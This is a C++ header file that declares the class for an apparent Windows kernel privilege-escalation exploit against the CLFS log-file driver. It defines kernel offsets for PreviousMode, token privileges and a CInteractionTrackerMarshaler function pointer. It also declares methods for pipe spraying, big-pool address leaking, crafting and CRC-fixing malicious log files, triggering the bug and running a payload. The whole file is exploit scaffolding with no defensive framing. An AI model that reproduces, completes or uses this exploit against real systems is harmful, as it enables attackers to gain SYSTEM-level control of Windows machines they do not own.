//
//
#pragma warning (disable : 4005)
#pragma warning(disable:28159)

#pragma once
#include <stdio.h>
#include <iostream>
#include <windows.h>
#include <clfsw32.h>
#include <ntstatus.h>
#include <processthreadsapi.h>
#include <tlhelp32.h>
#include "ntos.h"
#include "crc32.h"

#pragma comment(lib, "ntdll.lib")
#pragma comment(lib, "Clfsw32.lib")

VOID FindKernelModulesBase();

//
// NT syscalls
//
#define SystemModuleInformation  0xb
#define SystemHandleInformation 0x10


typedef struct _SYSTEM_BIGPOOL_ENTRY {
	union {
		PVOID VirtualAddress;
		ULONG_PTR NonPaged : 1;
	};
	SIZE_T SizeInBytes;
	union {
		UCHAR Tag[4];
		ULONG TagUlong;
	};
} SYSTEM_BIGPOOL_ENTRY, * PSYSTEM_BIGPOOL_ENTRY;


typedef struct _SYSTEM_BIGPOOL_INFORMATION {
	ULONG Count;
	SYSTEM_BIGPOOL_ENTRY AllocatedInfo[1];
} SYSTEM_BIGPOOL_INFORMATION, * PSYSTEM_BIGPOOL_INFORMATION;


typedef NTSTATUS(WINAPI* _NtQuerySystemInformation)(SYSTEM_INFORMATION_CLASS, PVOID, ULONG, PULONG);

typedef NTSTATUS(NTAPI* _NtWriteVirtualMemory)(HANDLE, PVOID, PVOID, SIZE_T, PSIZE_T);



//
// Version dependent offsets
//
#define OFFSET_OF_PREVIOUS_MODE 0x232
#define OFFSET_OF_WIN32PROCESS 0x3b0
#define OFFSET_OF_SEP_TOKEN_PRIVILEGES 0x40
#define OFFSET_OF_DCOMPOSITIONPROCESS 0x100


//
// CInteractionTrackerMarshaler object offsets
//
#define OFFSET_OF_FUNCTION 0x50
#define OBJECT_SIZE 0x1a0
typedef NTSTATUS func(HANDLE, HANDLE, PIO_APC_ROUTINE, PVOID, PIO_STATUS_BLOCK, ULONG, PVOID, ULONG, PVOID, ULONG);
typedef NTSTATUS func3(HANDLE, HANDLE, PIO_APC_ROUTINE, PVOID, PIO_STATUS_BLOCK, ULONG, PVOID, ULONG, PVOID, ULONG);


class clfs_eop
{
public:

	clfs_eop() {};
	~clfs_eop() {};

	//int crcCalculatorAndFix(char*, int);

	void fun_pipeSpray(int value, UINT64* temp_buffer);

	void getVirtualAddress();

	SIZE_T GetObjectKernelAddress(HANDLE Object);

	VOID InitEnvironment();

	int createInitialLogFile();

	UINT64 getBigPoolInfo();

	VOID craftbaseFile(FILE* pfile);

	VOID craftSprayFile(FILE* pfile);

	int FixCRCFile(WCHAR* _stored_temp_open);

	int crcCalculatorAndFix(char* mybuf, int mysize);

	int doFirstAlloc();

	VOID FindKernelModulesBase();

	void manage_args(int argc, TCHAR* argv[]);

	VOID RunPayload();

	void fun_prepare();

	WCHAR* logFileNames(int _i);

	WCHAR* containerNames(int _i);

	WCHAR* fileNames(int _i);

	int fun_trigger(WCHAR* _logfilename, WCHAR* _fopenfilename);

	void to_trigger();

};